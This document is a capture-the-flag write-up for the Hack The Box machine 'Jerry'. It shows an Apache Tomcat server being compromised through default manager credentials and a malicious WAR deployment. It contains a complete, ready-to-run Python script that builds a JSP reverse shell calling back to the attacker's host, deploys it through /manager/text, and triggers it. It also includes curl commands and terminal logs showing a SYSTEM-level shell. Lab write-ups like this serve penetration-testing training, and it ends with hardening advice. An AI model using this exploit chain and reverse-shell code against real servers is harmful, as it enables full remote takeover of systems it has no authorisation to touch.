RCE


The most common and easiest way to gain an initial foothold through Apache Tomcat is to upload and deploy a WAR file and have the web server execute it. This needs valid credentials for the manager application: the text interface at /manager/text requires an account with the manager-script role, while the HTML GUI at /manager/html requires manager-gui.

WAR file upload


As I was able to authenticate to the target Tomcat instance using the default credentials, I should be able to proceed to uploading and deploying a WAR file.

While it is entirely possible to do this via the web GUI, I prefer the command line method.

I got the payload ready. Now I just need to upload and deploy it.

┌──(kali㉿kali)-[~/archive/htb/labs/jerry]
└─$ curl -v -u 'tomcat:s3cret' --upload-file rce.war "http://$IP:8080/manager/text/deploy?path=/rce&update=true"
*   Trying 10.10.10.95:8080...
* Connected to 10.10.10.95 (10.10.10.95) port 8080 (#0)
* Server auth using Basic with user 'tomcat'
> PUT /manager/text/deploy?path=/rce&update=true HTTP/1.1
> Host: 10.10.10.95:8080
> Authorization: Basic dG9tY2F0OnMzY3JldA==
> User-Agent: curl/7.86.0
> Accept: */*
> Content-Length: 13317
> Expect: 100-continue
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 100 Continue
* We are completely uploaded and fine
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
< Cache-Control: private
< Expires: Thu, 01 Jan 1970 02:00:00 EET
< X-Content-Type-Options: nosniff
< Content-Type: text/plain;charset=utf-8
< Transfer-Encoding: chunked
< Date: Wed, 05 Apr 2023 15:08:56 GMT
< 
OK - Deployed application at context path /rce
* Connection #0 to host 10.10.10.95 left intact

Upload and deployment complete. The text manager answers every command with a single line beginning with OK or FAIL, so the response is easy to check from a script.

┌──(kali㉿kali)-[~/archive/htb/labs/jerry]
└─$ curl -s http://10.10.10.95:8080/rce/

Triggering the payload by requesting the new context. The request does not return while the shell is alive, which is expected.
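The three steps above (build the WAR, PUT it to /manager/text/deploy, request the context) as one script. This is an added example, not the write-up's own tooling: it builds the WAR with the standard library instead of msfvenom, embedding a plain JSP that wires cmd.exe to a TCP socket, and issues the same PUT that curl issued above. The listener address 10.10.14.2:9999 and the credentials tomcat:s3cret are taken from the session on this page; the context name /rce and the JSP itself are my choices.

```python
import base64
import io
import urllib.request
import zipfile

# Values taken from this write-up's session; adjust for your own engagement.
LHOST, LPORT = "10.10.14.2", 9999
TARGET = "http://10.10.10.95:8080"
USER, PASSWORD = "tomcat", "s3cret"
CONTEXT = "/rce"  # assumed context path, matching the curl command above

# Minimal JSP reverse shell: cmd.exe stdin/stdout pumped over a raw socket.
# Because the shell is cmd.exe on a raw socket, typed commands are echoed back,
# exactly as seen in the listener output on this page.
JSP_TEMPLATE = r"""<%@ page import="java.io.*,java.net.*" %>
<%
  Socket s = new Socket("__LHOST__", __LPORT__);
  Process p = new ProcessBuilder("cmd.exe").redirectErrorStream(true).start();
  InputStream pi = p.getInputStream(), si = s.getInputStream();
  OutputStream po = p.getOutputStream(), so = s.getOutputStream();
  while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (si.available() > 0) po.write(si.read());
    so.flush(); po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (IllegalThreadStateException e) {}
  }
  p.destroy(); s.close();
%>
"""

# web.xml is optional for Tomcat (index.jsp is a default welcome file), but an
# explicit one keeps the archive self-describing.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5">
  <welcome-file-list><welcome-file>index.jsp</welcome-file></welcome-file-list>
</web-app>
"""


def build_jsp(lhost: str, lport: int) -> str:
    """Fill the listener address into the JSP template."""
    return JSP_TEMPLATE.replace("__LHOST__", lhost).replace("__LPORT__", str(lport))


def build_war(lhost: str, lport: int) -> bytes:
    """A WAR is just a zip; return its bytes with index.jsp and WEB-INF/web.xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML)
        war.writestr("index.jsp", build_jsp(lhost, lport))
    return buf.getvalue()


def war_entries(war: bytes) -> dict:
    """Map of entry name -> bytes, useful for inspecting a WAR before shipping it."""
    with zipfile.ZipFile(io.BytesIO(war)) as z:
        return {name: z.read(name) for name in z.namelist()}


def deploy_request(base_url: str, context: str, user: str, password: str, war: bytes):
    """The same PUT that curl sent: /manager/text/deploy?path=<ctx>&update=true with Basic auth."""
    url = f"{base_url.rstrip('/')}/manager/text/deploy?path={context}&update=true"
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    headers = {"Authorization": f"Basic {token}", "Content-Type": "application/octet-stream"}
    return urllib.request.Request(url, data=war, method="PUT", headers=headers)


def deploy(base_url: str, context: str, user: str, password: str, war: bytes) -> str:
    """Upload the WAR and return the manager's one-line status (starts with OK or FAIL)."""
    req = deploy_request(base_url, context, user, password, war)
    with urllib.request.urlopen(req, timeout=30) as resp:
        status = resp.read().decode().strip()
    if not status.startswith("OK"):
        raise RuntimeError(f"manager refused the deployment: {status}")
    return status


def trigger(base_url: str, context: str) -> None:
    """Request the context once; the JSP blocks while the shell lives, so a timeout is normal."""
    try:
        urllib.request.urlopen(f"{base_url.rstrip('/')}{context}/", timeout=5)
    except Exception:
        pass  # timeout or reset once the shell is up; nothing to read back


if __name__ == "__main__":
    war = build_war(LHOST, LPORT)
    print(deploy(TARGET, CONTEXT, USER, PASSWORD, war))  # e.g. "OK - Deployed application at context path /rce"
    trigger(TARGET, CONTEXT)  # start the listener (nc -lvnp 9999) before running this
```

Start the listener before calling `trigger`; `deploy` raises on any `FAIL - ...` line (wrong role, bad context name, or a context that already exists without `update=true`), so a failed upload is not silently followed by a request to a context that was never created.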

┌──(kali㉿kali)-[~/archive/htb/labs/jerry]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
 
C:\apache-tomcat-7.0.88> whoami
 whoami
nt authority\system
 
C:\apache-tomcat-7.0.88> hostname
 hostname
JERRY
 
C:\apache-tomcat-7.0.88> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::1b
   IPv6 Address. . . . . . . . . . . : dead:beef::805b:2718:e1fc:cd4f
   Link-local IPv6 Address . . . . . : fe80::805b:2718:e1fc:cd4f%11
   IPv4 Address. . . . . . . . . . . : 10.10.10.95
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%11
                                       10.10.10.2
 
Tunnel adapter isatap.{E6565A26-EF2E-43A5-A579-B0F25E7B1DC8}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : htb

The target Tomcat instance was running with SYSTEM privileges, so a single WAR deployment is a full system-level compromise. Tomcat installed as a Windows service runs as LocalSystem unless the service account is changed, which is why the shell lands directly in nt authority\system; the fixes are a dedicated low-privilege service account, removal of the default manager credentials, and removing or restricting the manager application itself.